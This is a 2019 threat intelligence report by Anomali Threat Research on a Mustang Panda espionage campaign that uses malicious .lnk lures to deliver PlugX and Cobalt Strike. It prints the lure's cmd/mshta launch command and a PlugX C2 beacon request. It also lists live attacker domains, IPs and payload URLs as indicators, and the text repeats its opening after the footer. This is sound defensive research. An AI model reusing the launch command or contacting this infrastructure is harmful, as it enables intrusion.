Blog

China-Based APT Mustang Panda Targets Minority Groups, Public and Private Sector Organizations

This whitepaper examines a campaign believed to be conducted by China-based threat group, Mustang Panda. Read the paper from Anomali Threat Research.

Anomali Threat Research
October 7, 2019
Table of contents
<h2>Overview</h2> <p>The Anomali Threat Research Team has identified an ongoing campaign which it believes is being conducted by the China-based threat group, Mustang Panda. The team first revealed these findings on Wednesday, October 2, during Anomali Detect 19, the company’s annual user conference, in a session titled: “Mustang Panda Riding Across Country Lines.”</p> <p>CrowdStrike researchers first published information on Mustang Panda in June 2018, after approximately one year of observing malicious activities that shared unique Tactics, Techniques, and Procedures (TTPs).<sup>[1]</sup> This campaign dates back to at least November 2018. The research does not indicate with absolute certainty which entities are being targeted or the impact the campaign has had. Based on the lure documents observed by Anomali, we believe that the following may be targeted:</p> <ul> <li>Individuals interested in the United Nations’ Security Council Committee resolutions regarding the Islamic State in Iraq and the Levant (ISIL / Da’esh)</li> <li>Mongolian-based MIAT Airlines</li> <li>Non-profit China Center (China-Zentrum e.V.); according to its website, this officially recognized nonprofit organization’s aim is to foster encounters and exchange between cultures and religions in the West and in China</li> <li>Targeted countries including but not limited to Germany, Mongolia, Myanmar (Burma), Pakistan, Vietnam</li> <li>The Communist Party of Vietnam (CVP)</li> <li>The Shan Tai; a group of people living in Southeast Asia, which Minority Rights Group International describes as a “minority” in the region, with members who are primarily Theravada Buddhists</li> </ul> <p>The malicious activity found by Anomali aligns with TTPs, specifically two through six, first identified by CrowdStrike. The observed TTPs consist of the following:</p> <ol> <li>Use of zip file that contains a “.lnk” (Windows Shortcut) file.</li> <li>Utilization of double extension trick (sample.doc.lnk) to convince users to open the file.</li> <li>HTA (HTML Application) with VBScript embedded in the “.lnk” file</li> <li>VBScript drops payloads and opens a decoy document or PDF to the user.</li> <li>Usage of PlugX and Cobalt Strike payloads.<sup>[2]</sup></li> </ol> <p>The infection chain observed by Anomali researchers in this campaign is shown below in Figure 1.</p> <p style="text-align: center;"><em><img alt="Figure 1 – Infection vector" src="https://cdn.filestackcontent.com/y4n8QQVFSSueTIlWKe2T"/><br/> Figure 1 – Infection vector</em></p> <p>We also found similarities in targeting in Mongolia and an NGO. The use of United Nations’ documents regarding activities in the Middle East may also be indicative of think-tank targeting. Furthermore, the use of PlugX malware also aligns with CrowdStrike’s previous findings of activity attributed to Mustang Panda.<sup>[3]</sup></p> <p>Analysts’ note: The language capabilities to read some of the lure documents is not available within Anomali at this time. We would encourage those with the language skills necessary to analyze the documents further.</p> <h2>Targeting</h2> <p>In mid-August 2019, the Anomali Threat Research Team discovered suspicious “.lnk” files during routine intelligence collection. While the distribution method of these documents cannot be confirmed at this time, it is likely that spearphishing is being utilized because it aligns with Mustang Panda’s TTPs, and it is a common tactic used amongst APT actors. The lure documents are also too specific in their targeting, and the targeted entities and individuals would be of interest to a China-sponsored threat group.</p> <p>Further analysis of the files led to the identification of other “.lnk” files that were attempting to infect individuals with a Cobalt Strike Beacon (penetration-testing tool) or PlugX (Remote Access Tool (RAT); other payloads were unable to be identified as of this writing. Anomali researchers identified 15 malicious documents that we believe were utilized by Mustang Panda in an ongoing campaign. The documents reveal malicious activity dating from at least November 2018 up to August 29, 2019. The date of this activity is confirmed by the VirusTotal (VT) submission dates, which will be analyzed further in the following sections. In addition, the dates within the documents go back as far as October 8, 2017, therefore, it is possible this activity goes back to 2017 if the group was using current content in their lures. The primary target of this campaign were found to be the ruling political party of Vietnam, The Communist Party of Vietnam (CPV); other targets observed in the malicious documents include the following:</p> <ul> <li>CPV of Lang Son province, Vietnam</li> <li>CPV of Lao Cai province, Vietnam</li> <li>Embassy of Vietnam, China</li> <li>Henan Provincial Party Committee, Vietnam</li> <li>Individuals who would find United Nations’ documents of interest, potentially think tanks</li> <li>MIAT Airlines, Mongolian airline</li> <li>Police of Sindh Province, Pakistan</li> <li>Restoration Council of Shan State / Shan State Army, Loi Tai Leng, Southern Shan State, Myanmar (Burma)</li> <li>The China Center (China Zentrum e.V), Germany</li> </ul> <p>The lure documents are themed to be relevant to their targets, and in some cases are copies of legitimate documents that are publicly available. The “.lnk” files being utilized by Mustang Panda typically contain an embedded HTA script that, once executed, will drop and open the decoy document while the malicious activity of the payload runs in the background. Other lure documents are themed to be relevant to their targets, and in some cases are legitimate documents that are publicly available. The final type of malicious document we observed were empty, and only contain an image, such as requesting for macros to be enabled, used to distract someone while malicious activity takes place in the background.</p> <h2>Lure Document Analysis</h2> <p>The 15 documents will be discussed below from the most recent VT submission to the earliest. The identified samples follow the same infection chain, and the technical analysis will be discussed in a later section.</p> <p><strong>Document</strong> – 1<br/> <strong>Document Title</strong> – TCO BT574.doc<br/> <strong>Sample</strong> – 05CF906B750EB335125695DA42F4EAFC<br/> <strong>Payload</strong> – Cobalt Strike<br/> <strong>Submission date</strong> – 8/29/2019 1:27:41 AM</p> <p style="text-align: center;"><em><img alt="Figure 2 – TCO BT574.doc" src="https://cdn.filestackcontent.com/jfI7wHEiQumgR8DKJtC4"/><br/> Figure 2 – TCO BT574.doc</em></p> <p>As seen above, this document is addressed to the Embassy of Vietnam in China. The document appears to discuss a warning issued to the Vietnam government related to a military exercise on a set of coordinates. Specifically, the document informs that no civilian ships are allowed on said coordinates. The document continues and mentions a new ice-breaking ship called “Snow Dragon 2” and mentions August 15, 2019, as the beginning of a 35-day trial run. This document indicates a regional interest with specificity.</p> <p><strong>Document</strong> – 2<br/> <strong>Document Title</strong> – 32_1.PDF<br/> <strong>Sample</strong> – 9A180107EFB15A00E64DB3CE6394328D<br/> <strong>Payload</strong> – Cobalt Strike Beacon<br/> <strong>Submission date</strong> – 8/26/2019 6:28:40 AM</p> <p style="text-align: center;"><em><img alt="Figure 3 – 32_1.pdf" src="https://cdn.filestackcontent.com/bvCv0P95T9GVw4hHemwO"/><br/> Figure 3 – 32_1.pdf</em></p> <p>Mustang Panda is using this decoy document, dated August 15, 2019, to target the People’s Committee Lang Son Province. The Peoples’ Committee is the executive branch of a Vietnamese province.<sup>[4]</sup> The Lang Son province shares a border with China’s Guangxi Province. The area has historically served as an important location for trade, and therefore control over the location has long been disputed and fought over.<sup>[5]</sup> The border shared between China and Vietnam measures 1,281 km in length and multiple wars and numerous lives have been lost in conflicts fought, the complexities and intricacies of which will not be further discussed.<sup>[6]</sup></p> <p><strong>Document</strong> – 3<br/> <strong>Document Title</strong> – Daily News (19-8-2019)<br/> <strong>Sample</strong> – 5F094CB3B92524FCED2731C57D305E78<br/> <strong>Payload</strong> – PlugX<br/> <strong>Submission date</strong> – 8/19/2019 6:11:32 AM</p> <p style="text-align: center;"><em><img alt="Figure 4 – Daily News (19-8-2019)" src="https://cdn.filestackcontent.com/R7QPTzQwTnebIkNjiBPD"/><br/> Figure 4 – Daily News (19-8-2019)</em></p> <p>This document appears to be targeting the Shan Tai people by using a document referencing the Restoration Council of Shan State (RCSS). The Shan Tai people make up the largest minority group in Myanmar (Burma) and are located in Northwestern and Eastern Myanmar (Burma) and the Yunnan province in China.<sup>[7]</sup> The RCSS, also referred to as Shan State Army (SSA), is a government/political organization that is headquartered in Loi Tai Leng, Southern Shan state, in present-day Myanmar (Burma), bordering Thailand.<sup>[8]</sup> The targeting of minority groups is a known tactic used by the government of the People’s Republic of China.</p> <p><strong>Document</strong> – 4<br/> <strong>Document Title</strong> – S_2019_50_E.lnk<br/> <strong>Sample</strong> – 4FE276EDC21EC5F2540C2BABD81C8653<br/> <strong>Payload</strong> – PlugX<br/> <strong>Submission date</strong> – 6/6/2019 9:37:18 AM</p> <p style="text-align: center;"><em><img alt="Figure 5 – S_2019_50_E.docx" src="https://cdn.filestackcontent.com/oCkLkzrmQNC7EtxeAv3i"/><br/> Figure 5 – S_2019_50_E.docx</em></p> <p>Mustang Panda retrieved this document from the United Nations Digital Library that is titled “Letter dated 15 January 2019 from the Chair of the Security Council Committee Established pursuant to Resolutions 1267 (1999), 1989 (2011) and 2253 (2015) concerning Islamic State in Iraq and the Levant (Da'esh), Al-Qaida and Associated Individuals, Groups, Undertakings and Entities addressed to the President of the Security Council.”<sup>[9]</sup></p> <p>At the time of this writing, it is unknown who, or what this document may be targeting. However, think-tank organizations may be interested in such a document, and said organizations were found to be targets of Mustang Panda by CrowdStrike.<sup>[10]</sup></p> <p><strong>Document</strong> – 5<br/> <strong>Document Title</strong> – European.lnk<br/> <strong>Sample</strong> – 9FF1D3AF1F39A37C0DC4CEEB18CC37DC<br/> <strong>Payload</strong> – PlugX<br/> <strong>Submission date</strong> – 6/5/2019 6:28:25 PM</p> <p style="text-align: center;"><em><img alt="Figure 6 – European.lnk" src="https://cdn.filestackcontent.com/bwhR0rpIQgpxDhmMMSEc"/><br/> Figure 6 – European.lnk</em></p> <p>“European.doc” is targeting The China Center (China Zentrum e.V) is, according to its website, a non-profit organization that “encourages encounters and exchange between cultures and religions in the West and in China. The members of the China-Zentrum are Catholic aid organizations, religious orders and dioceses in Germany, Austria, Switzerland and Italy.”<sup>[11]</sup></p> <p>Targeting of NGOs was first documented by CrowdStrike and we believe we have observed Mustang Panda attempting to attack a similar type of target.<sup>[12]</sup> In addition, an institution focused on exchanging cultural knowledge aligns with China’s strategic interests.</p> <h2>Targeting Pakistan</h2> <p>Upon pivoting from the C2 domain apple-net[.]com, observed in the other samples that are part of the campaign, Anomali found a malicious sample that targets the Police of the Sindh Province in Pakistan. The PlugX malware has been observed as the payload that is targeting the Sindh Province police.</p> <p style="text-align: center;"><em><img alt="Figure 7 – Samples Connecting to apple-net[.]com" src="https://cdn.filestackcontent.com/4fEHm9JlTOic9xhJQi9Y"/><br/> Figure 7 – Samples Connecting to apple-net[.]com</em></p> <p style="text-align: center;"><em><img alt="Figure 8 – DSR &amp; CSR of Special Branch Sind.exe" src="https://cdn.filestackcontent.com/4YdqcEqKSYKupmOdV1w8"/><br/> Figure 8 – DSR &amp; CSR of Special Branch Sind.exe</em></p> <h2>Technical Analysis</h2> <p>The “.lnk” files being utilized by MustangPanda typically contain an embedded HTA file with VBscript or PowerShell script that, once executed, will drop and open the decoy document while malicious activity of the payload runs in the background. Throughout the campaign we observed PlugX and Cobalt Strike being delivered as the primary payloads.</p> <p style="text-align: center;"><em><img alt="Figure 9 – Infection vector" src="https://cdn.filestackcontent.com/lX9bt3vfQHmuNwsCxLa5"/><br/> Figure 9 – Infection vector</em></p> <h3>“.lnk” File Analysis</h3> <p>In Windows “.lnk” is the file extension for shortcut files which points to an executable file. “.lnk” files usually holds plenty of forensic artifacts and they can reveal valuable information about the threat actor’s environment. The metadata from the “.lnk” files led us to pivot to more samples from the same campaign.</p> <p style="text-align: center;"><em><img alt="Figure 10 – “.lnk” File" src="https://cdn.filestackcontent.com/lhM4qsRRaWc1LgysWwtQ"/><br/> Figure 10 – “.lnk” File</em></p> <p>Table 1 below shows the files that were part of the recent campaign from Mustang Panda.</p> <p style="text-align: center;"><em>Table 1 – Analyzed Samples</em></p> <table class="table table-striped" style="table-layout: fixed;"> <tbody> <tr> <th>MD5</th> <th>Link Creation Date</th> <th>File Name</th> <th>Payload</th> </tr> <tr> <td style="word-wrap: break-word;">165F8683681A4B136BE1F9D6EA7F00CE</td> <td>11/21/10 3:24</td> <td>chuong trinh dang huong.doc.lnk</td> <td>Cobalt strike</td> </tr> <tr> <td style="word-wrap: break-word;">9FF1D3AF1F39A37C0DC4CEEB18CC37DC</td> <td>11/21/10 3:24</td> <td>European.lnk</td> <td>PlugX</td> </tr> <tr> <td style="word-wrap: break-word;">4FE276EDC21EC5F2540C2BABD81C8653</td> <td>11/21/10 3:24</td> <td>S_2019_50_E.lnk</td> <td>PlugX</td> </tr> <tr> <td style="word-wrap: break-word;">11ADDA734FC67B9CFDF61396DE984559</td> <td>11/21/10 3:24</td> <td>Chuong trinh hoi nghi.doc.lnk</td> <td>Cobalt strike</td> </tr> <tr> <td style="word-wrap: break-word;">08F25A641E8361495A415C763FBB9B71</td> <td>11/21/10 3:24</td> <td>GIAY MOI.doc.lnk</td> <td>Cobalt Strike</td> </tr> <tr> <td style="word-wrap: break-word;">01D74E6D9F77D5202E7218FA524226C4</td> <td>11/21/10 3:24</td> <td>421 CV.doc.lnk</td> <td>Cobalt Strike</td> </tr> <tr> <td style="word-wrap: break-word;">6198D625ADA7389AAC276731CDEBB500</td> <td>11/21/10 3:24</td> <td>GIAYMOI.doc.lnk</td> <td>Cobalt strike</td> </tr> <tr> <td style="word-wrap: break-word;">9B39E1F72CF4ACFFD45F45F08483ABF0</td> <td>11/21/10 3:24</td> <td>CV trao doi CAT Cao Bang.doc.lnk</td> <td>Cobalt strike</td> </tr> <tr> <td style="word-wrap: break-word;">748DE2B2AA1FA23FA5996F287437AF1B</td> <td>11/20/10 21:29</td> <td>cf56ee00be8ca49d150d85dcb6d2f336.jpg.lnk</td> <td>PlugX</td> </tr> <tr> <td style="word-wrap: break-word;">5F094CB3B92524FCED2731C57D305E78</td> <td>11/21/10 3:24</td> <td>Daily News (19-8-2019)(Soft Copy).lnk</td> <td>PlugX</td> </tr> <tr> <td style="word-wrap: break-word;">9A180107EFB15A00E64DB3CE6394328D</td> <td>11/21/10 3:24</td> <td>32_1.PDF.lnk</td> <td>Cobalt strike</td> </tr> <tr> <td style="word-wrap: break-word;">05CF906B750EB335125695DA42F4EAFC</td> <td>11/21/10 3:24</td> <td>TCO BT 574.doc.lnk</td> <td>Cobalt strike</td> </tr> <tr> <td style="word-wrap: break-word;">F62DFC4999D624D01E94B89946EC1036</td> <td>11/21/10 3:24</td> <td>sach tham khao Bo mon.docx.lnk</td> <td>PlugX</td> </tr> <tr> <td style="word-wrap: break-word;">CA775717D000888A7F71A5907B9C9208</td> <td>11/21/10 3:24</td> <td>tieu luan ve quyen lam chu cua nhan dan.docx.lnk</td> <td>PlugX</td> </tr> <tr> <td style="word-wrap: break-word;">AA115F20472E78A068C1BBF739C443BF</td> <td>11/21/10 3:24</td> <td>vai tro cua nhan dan.doc.lnk</td> <td>PlugX</td> </tr> <tr> <td style="word-wrap: break-word;">11511b3d69fbb6cceaf1dd0278cbedfb</td> <td>11/21/10 3:24</td> <td>For National Department Sar KNU JMC people Meeting 2019.lnk</td> <td>PlugX</td> </tr> </tbody> </table> <p>Once the user opens the “.lnk” file, the embedded HTA file will be executed via “mshta.exe”, it then writes a PowerShell script name “3.ps1” in the “%TEMP%” directory. The PowerShell script is then executed using Windows Management Instrumentation (WMI) in a hidden window via WMI Tasks.<sup>[13]</sup></p> <p style="text-align: center;"><em><img alt="Figure 11 – VBScript drops PowerShell script" src="https://cdn.filestackcontent.com/Q6vUTjTPeLSiovqEWB4w"/><br/> Figure 11 – VBScript drops PowerShell script</em></p> <p style="text-align: center;"><em><img alt="Figure 12 – Using WMI to execute PowerShell Script in Hidden window" src="https://cdn.filestackcontent.com/jy9OTfjRruoJJpllyO7G"/><br/> Figure 12 – Using WMI to execute PowerShell Script in Hidden window</em></p> <p>The dropped file “3.ps1” is a base64 encoded PowerShell script. Upon execution it performs the below operations on the target host:</p> <ol> <li>Checks if the user has Administrator privilege</li> <li>Drops the Cobalt Strike Stager in debug or “%TEMP%” directory as “tmp_FlVnNI.dat” depending on the user privilege</li> <li>Opens the decoy Word document</li> <li>Locates the InstallUtil.exe and its installed version</li> <li>Copies “schtasks.exe” to “%TEMP%” directory and renames it to “wtask.exe”</li> <li>Creates Scheduled tasks with the name “Security Script kb00855787”</li> <li>Renames “wscript.exe” into “winwsh.exe”</li> <li>Runs the scheduled task to execute the Cobalt Strike Stager</li> <li>C2 communication</li> </ol> <p style="text-align: center;"><em><img alt="Figure 13 – Scheduled Task Creation" src="https://cdn.filestackcontent.com/unrWhdRtTACc7O1MhLzx"/><br/> Figure 13 – Scheduled Task Creation</em></p> <p style="text-align: center;"><em><img alt="Figure 14 – PowerShell Script Creates Scheduled Task" src="https://cdn.filestackcontent.com/RfyFg3DQuOFIYxoAshL5"/><br/> Figure 14 – PowerShell Script Creates Scheduled Task</em></p> <p style="text-align: center;"><em><img alt="Figure 15 – Cobalt Strike Payload" src="https://cdn.filestackcontent.com/2OfnXlVCQquS5ftxheGA"/><br/> Figure 15 – Cobalt Strike Payload</em></p> <p>During our analysis, we could not acquire the second stage payload as the C2 servers were not functioning or had been taken down by the threat actors.</p> <h3>PlugX Payload Analysis</h3> <p>“.lnk” files that used PlugX as the payload were abnormally big in size. In general, the “.lnk” files are less than 10Kb, but the malicious samples in the campaign were more than 700Kb. Upon taking a closer look we found that the “.lnk” files were embedded with 3 base64 encoded executables.</p> <p>Upon opening the LNK file, it will then proceed to execute the below command via cmd.exe.</p> <p><strong>command:</strong> /c for %x in (%temp%=%cd%) do for /f "delims==" %i in ('dir "%x ieu luan ve quyen lam chu cua nhan dan.docx.lnk" /s /b') do start m%windir:~-1,1%hta .exe "%i"</p> <p>The command executes the HTA file embedded inside the shortcut and it decodes and drops 3 executables in the “%TEMP%” directory and opens a decoy word document to the user.</p> <p style="text-align: center;"><em><img alt="Figure 16 – Extracted binaries and Decoy document" src="https://cdn.filestackcontent.com/KLb2O2GOTgGYHNRAFWDV"/><br/> Figure 16 – Extracted binaries and Decoy document</em></p> <p>All three dropped files were then moved to a new folder “C:ProgramDataMicrosoft Malware ProtectionGHQ”</p> <p style="text-align: center;"><em><img alt="Figure 17 – Binaries moved to different path" src="https://cdn.filestackcontent.com/85tIfVOtT8WVTb3jSa2o"/><br/> Figure 17 – Binaries moved to different path</em></p> <p>The “3.exe” is a legitimate executable and it is signed by “ESET, spol. s r.o.” and it is being abused for DLL hijacking technique to execute http_dll.dll which decodes and loads the malicious payload http_dll.dat.</p> <p style="text-align: center;"><em>Table 2 – PlugX Hashes</em></p> <table class="table table-striped" style="table-layout: fixed;"> <thead> <tr> <th>File Name</th> <th>Hash</th> </tr> </thead> <tbody> <tr> <td>3.exe (original name: EHttpSrv.exe)</td> <td style="word-wrap: break-word;">28C6F235946FD694D2634C7A2F24C1BA</td> </tr> <tr> <td>http_dll.dll</td> <td style="word-wrap: break-word;">9912EB641EABD640A476720C51F5E3AD</td> </tr> <tr> <td>http_dll.dat</td> <td style="word-wrap: break-word;">2BC7298A57AE2B8AB5B4A7B53360EB5C</td> </tr> </tbody> </table> <p>After the payload execution it reaches out to the C2 via POST request as shown below.</p> <pre> POST /update?wd=4337295e HTTP/1.1 Accept: */* x-debug: 0 x-request: 0 x-content: 61456 x-storage: 1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1; Host: aridndvn.ccom:443 Content-Length: 0 Proxy-Connection: Keep-Alive Pragma: no-cache</pre> <p>If the C2 is not available the payload tries to reach different embedded C2 domains on unique ports.</p> <p style="text-align: center;"><em><img alt="Figure 18 – Network connections to C2" src="https://cdn.filestackcontent.com/wONhRfObTXCh731MRBQz"/><br/> Figure 18 – Network connections to C2</em></p> <h2>Conclusion</h2> <p>The malicious operations conducted by Mustang Panda in this campaign appear to be ongoing. The targets, indicated by specific lure documents, are government or align strategically with a China-sponsored APT group. China is currently in its 13th Five-Year Plan (2016-2020) that focus on the following themes: innovation, coordinated development, green growth, openness, and inclusive growth, respectively.<sup>[14]</sup> The objective of increasing exports and specific imports, which falls under openness, would align with the targeting of the Lang Son province and its history of trade. Utilizing lures themed around political parties, the Sindh police, and UN documents would align with innovation, which is described “as the cornerstone of China’s development strategy” and attempts of “enhancing its future global competitiveness and technological edge.”<sup>[15]</sup> Targeting entities, or related entities, of said lures indicates a potential regional interest in strategic information that may be of significance to a government. In addition, the TTPs observed by CrowdStrike are identical to the ones observed by Anomali.</p> <p>This activity has been ongoing since at least November 2018, and possibly as far back to at least October 2017 if the lure documents were distributed around the times mentioned in them. This kind of malicious activity sponsored by China will likely continue as the country expands its efforts for the ongoing Belt and Road Initiative that seeks to invest in infrastructure in over 100 countries. Such economic and investment-led initiatives will cause China to be more interested in the regions its investing in, therefore it is likely that APT-related activity will follow.</p> <h2>IOCs</h2> <p>In addition, ATR found that the documents were attempting to, or were able to connect to the following Command and Control (C2) domains and IP addresses:</p> <table class="table table-striped"> <tbody> <tr> <th>Domain</th> <th>IPs</th> <th>First Seen</th> </tr> <tr> <td>adobephotostage.com</td> <td>50.63.202.94</td> <td>6/29/19 22:03</td> </tr> <tr> <td>adobephotostage.com</td> <td>50.63.202.67</td> <td>6/24/19 16:30</td> </tr> <tr> <td>adobephotostage.com</td> <td>50.63.202.82</td> <td>6/7/19 1:31</td> </tr> <tr> <td>adobephotostage.com</td> <td>184.168.221.94</td> <td>6/22/19 3:30</td> </tr> <tr> <td>adobephotostage.com</td> <td>184.168.221.82</td> <td>6/19/19 14:24</td> </tr> <tr> <td>adobephotostage.com</td> <td>184.168.221.71</td> <td>6/10/19 6:57</td> </tr> <tr> <td>adobephotostage.com</td> <td>50.63.202.73</td> <td>6/1/19 9:49</td> </tr> <tr> <td>adobephotostage.com</td> <td>207.148.12.47</td> <td>6/7/18 10:05</td> </tr> <tr> <td>adobephotostage.com</td> <td>149.28.74.41</td> <td>6/4/18 11:33</td> </tr> <tr> <td>adobephotostage.com</td> <td>207.148.78.101</td> <td>5/31/18 3:26</td> </tr> <tr> <td>adobephotostage.com</td> <td>149.28.74.149</td> <td>5/24/18 7:19</td> </tr> <tr> <td>adobephotostage.com</td> <td>50.63.202.59</td> <td>5/22/18 20:29</td> </tr> <tr> <td>olk4.com</td> <td>198.54.117.200</td> <td>9/11/19 23:17</td> </tr> <tr> <td>olk4.com</td> <td>198.54.117.199</td> <td>8/3/19 1:29</td> </tr> <tr> <td>olk4.com</td> <td>198.54.117.197</td> <td>8/3/19 1:29</td> </tr> <tr> <td>olk4.com</td> <td>198.54.117.198</td> <td>8/3/19 1:29</td> </tr> <tr> <td>olk4.com</td> <td>162.255.119.150</td> <td>7/25/19 8:20</td> </tr> <tr> <td>apple-net.com</td> <td>167.88.180.148</td> <td>6/12/19 23:41</td> </tr> <tr> <td>apple-net.com</td> <td>167.88.177.224</td> <td>3/22/19 3:11</td> </tr> <tr> <td>apple-net.com</td> <td>167.88.180.3</td> <td>10/29/18 12:21</td> </tr> <tr> <td>apple-net.com</td> <td>45.248.87.14</td> <td>10/21/18 18:20</td> </tr> <tr> <td>apple-net.com</td> <td>91.195.240.117</td> <td>8/6/18 7:08</td> </tr> <tr> <td>apple-net.com</td> <td>103.224.182.250</td> <td>4/25/18 11:40</td> </tr> <tr> <td>wbemsystem.com</td> <td>167.88.177.224</td> <td>7/29/19 0:00</td> </tr> <tr> <td>yahoorealtors.com</td> <td>167.88.178.24</td> <td>7/4/19 13:00</td> </tr> <tr> <td>yahoorealtors.com</td> <td>185.239.226.19</td> <td>6/25/19 0:00</td> </tr> <tr> <td>yahoorealtors.com</td> <td>185.239.226.19</td> <td>4/3/19 1:17</td> </tr> <tr> <td>yahoorealtors.com</td> <td>45.77.209.52</td> <td>1/18/18 7:11</td> </tr> <tr> <td>infosecvn.com</td> <td>167.88.178.118</td> <td>8/27/19 2:14</td> </tr> <tr> <td>infosecvn.com</td> <td>185.239.226.61</td> <td>7/10/18 1:02</td> </tr> <tr> <td>infosecvn.com</td> <td>45.77.184.12</td> <td>5/30/18 16:29</td> </tr> <tr> <td>airdndvn.com</td> <td>167.88.178.118</td> <td>6/27/19 0:00</td> </tr> <tr> <td>airdndvn.com</td> <td>185.239.226.61</td> <td>6/14/18 9:43</td> </tr> <tr> <td>airdndvn.com</td> <td>45.77.184.12</td> <td>5/31/18 13:50</td> </tr> <tr> <td>officeproduces.com</td> <td>45.32.50.150</td> <td>7/25/19 7:10</td> </tr> <tr> <td>web.adobephotostage.com</td> <td> </td> <td> </td> </tr> <tr> <td>Web.officeproduces.com:8080</td> <td> </td> <td> </td> </tr> <tr> <td>Up.officeproduces.com</td> <td> </td> <td> </td> </tr> <tr> <td>We.officeproduces.com</td> <td> </td> <td> </td> </tr> <tr> <td>Download.officeproduces.com:443</td> <td> </td> <td> </td> </tr> <tr> <td>geocities.jp</td> <td> </td> <td> </td> </tr> <tr> <td>update.olk4.com:53</td> <td> </td> <td> </td> </tr> <tr> <td>www.cab-sec.com</td> <td>167.88.180.15</td> <td>09/18/2019 3:10</td> </tr> <tr> <td> </td> <td>43.254.217.67</td> <td> </td> </tr> <tr> <td> </td> <td>154.221.24.47</td> <td> </td> </tr> <tr> <td> </td> <td>144.202.54.86</td> <td> </td> </tr> </tbody> </table> <h2>URLs</h2> <ul> <li>http://144.202.54.86/vkt2</li> <li>http://144.202.54.86/download/Mau2.hta</li> <li>http://144.202.54.86/download/Mau%20cam%20ket%20danh%20cho%20Chua%20Dang%20vien.docx</li> <li>http://airdndvn.com/6CDC9F833C87FB661DBB9339</li> <li>http://www.wbemsystem.com/B2FC407BB86E8219/397A4853</li> <li>web.officeproduces.com:8000/update?wd=1b1fe9aa</li> <li>154.221.24.47/HaQ3</li> </ul> <h2>File Hashes</h2> <p>165F8683681A4B136BE1F9D6EA7F00CE<br/> 9FF1D3AF1F39A37C0DC4CEEB18CC37DC<br/> 4FE276EDC21EC5F2540C2BABD81C8653<br/> 11ADDA734FC67B9CFDF61396DE984559<br/> 08F25A641E8361495A415C763FBB9B71<br/> 01D74E6D9F77D5202E7218FA524226C4<br/> 6198D625ADA7389AAC276731CDEBB500<br/> 9B39E1F72CF4ACFFD45F45F08483ABF0<br/> 748DE2B2AA1FA23FA5996F287437AF1B<br/> 5F094CB3B92524FCED2731C57D305E78<br/> 9A180107EFB15A00E64DB3CE6394328D<br/> 05CF906B750EB335125695DA42F4EAFC<br/> F62DFC4999D624D01E94B89946EC1036<br/> CA775717D000888A7F71A5907B9C9208<br/> AA115F20472E78A068C1BBF739C443BF</p> <h2>Endnotes</h2> <p><sup>[1]</sup> Adam Meyers, “Meet CrowdStrike’s Adversary of the Month for June: MUSTANG PANDA,” CrowdStrike Blog, accessed September 17, 2019, published June 15, 2018, https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/.</p> <p><sup>[2]</sup> Ibid.</p> <p>[3] Ibid.</p> <p><sup>[4]</sup> Dr. Joop de Wit, “Decentralisation, Local Governance and Community Participation in Vietnam,” United Nations (2016): 5, accessed September 18, 2019, http://www.un.org.vn/en/publications/one-un-documents/cat_view/106-one-un-documents/124-reference-documents.html.</p> <p><sup>[5]</sup> Kathy Wilheml, “China, Vietnam Make Money, Not War; Border Tensions Remain : Asia: Many fear the dispute over Friendship Pass and more than 200 other sites could reignite fighting between the longtime enemies,” Los Angeles Times, accessed September 18, 2019, published October 22, 1995, https://www.latimes.com/archives/la-xpm-1995-10-22-mn-59742-story.html.</p> <p><sup>[6]</sup> “Vietnam – Geography,” GlobalSecurity, accessed September 18, 2019, https://www.globalsecurity.org/military/world/vietnam/geography.htm.</p> <p><sup>[7]</sup> The Editors of Encyclopaedia Britannica, “Shan,” Encyclopaedia Britannica, accessed September 17, 2019, https://www.britannica.com/topic/Shan; “Shans,” World Culture Encyclopedia, accessed September 18, 2019, https://www.everyculture.com/wc/Mauritania-to-Nigeria/Shans.html.</p> <p><sup>[8]</sup> “Restoration Council of Shan State/ Shan State Army,” Myanmar Peace Monitor, accessed September 17, 2018, https://www.mmpeacemonitor.org/1598.</p> <p><sup>[9]</sup> https://digitallibrary.un.org/record/1663461. Accessed September 18, 2019.</p> <p><sup>[10]</sup> Adam Meyers, “Meet CrowdStrike’s Adversary of the Month for June: MUSTANG PANDA,” CrowdStrike Blog.</p> <p><sup>[11]</sup> http://www.china-zentrum.de/. Accessed September 18, 2019.</p> <p><sup>[12]</sup> Adam Meyers, “Meet CrowdStrike’s Adversary of the Month for June: MUSTANG PANDA,” CrowdStrike Blog.</p> <p><sup>[13]</sup> Windows Dev Center, “WMI Tasks: Processes,” Microsoft, accessed September 18, 2019, https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-tasks--processes.</p> <p><sup>[14]</sup> Katherine Koleski, “The 13th Five-Year-Plan,” The United States-China Economic and Security Review Commission, accessed September 20, 2019, published February 14, 2017, https://www.uscc.gov/sites/default/files/Research/The%2013th%20Five-Year%20Plan_Final_2.14.17_Updated%20%28002%29.pdf. 3.</p> <p><sup>[15]</sup> Ibid.</p>
Anomali Threat Research

Anomali's Threat Research team continually tracks security threats to identify when new, highly critical security threats emerge. The Anomali Threat Research team's briefings discuss current threats and risks like botnets, data breaches, misconfigurations, ransomware, threat groups, and various vulnerabilities. The team also creates free and premium threat intelligence feeds for Anomali's industry-leading Threat Intelligence Platform, ThreatStream.

Discover More About Anomali

Get the latest news about Anomali's Security and IT Operations platform,

SEe all Resources
No items found.
No items found.

Propel your mission with amplified visibility, analytics, and AI.

Learn how Anomali can help you cost-effectively improve your security posture.

October 7, 2019
-
Anomali Threat Research
,

China-Based APT Mustang Panda Targets Minority Groups, Public and Private Sector Organizations

<h2>Overview</h2> <p>The Anomali Threat Research Team has identified an ongoing campaign which it believes is being conducted by the China-based threat group, Mustang Panda. The team first revealed these findings on Wednesday, October 2, during Anomali Detect 19, the company’s annual user conference, in a session titled: “Mustang Panda Riding Across Country Lines.”</p> <p>CrowdStrike researchers first published information on Mustang Panda in June 2018, after approximately one year of observing malicious activities that shared unique Tactics, Techniques, and Procedures (TTPs).<sup>[1]</sup> This campaign dates back to at least November 2018. The research does not indicate with absolute certainty which entities are being targeted or the impact the campaign has had. Based on the lure documents observed by Anomali, we believe that the following may be targeted:</p> <ul> <li>Individuals interested in the United Nations’ Security Council Committee resolutions regarding the Islamic State in Iraq and the Levant (ISIL / Da’esh)</li> <li>Mongolian-based MIAT Airlines</li> <li>Non-profit China Center (China-Zentrum e.V.); according to its website, this officially recognized nonprofit organization’s aim is to foster encounters and exchange between cultures and religions in the West and in China</li> <li>Targeted countries including but not limited to Germany, Mongolia, Myanmar (Burma), Pakistan, Vietnam</li> <li>The Communist Party 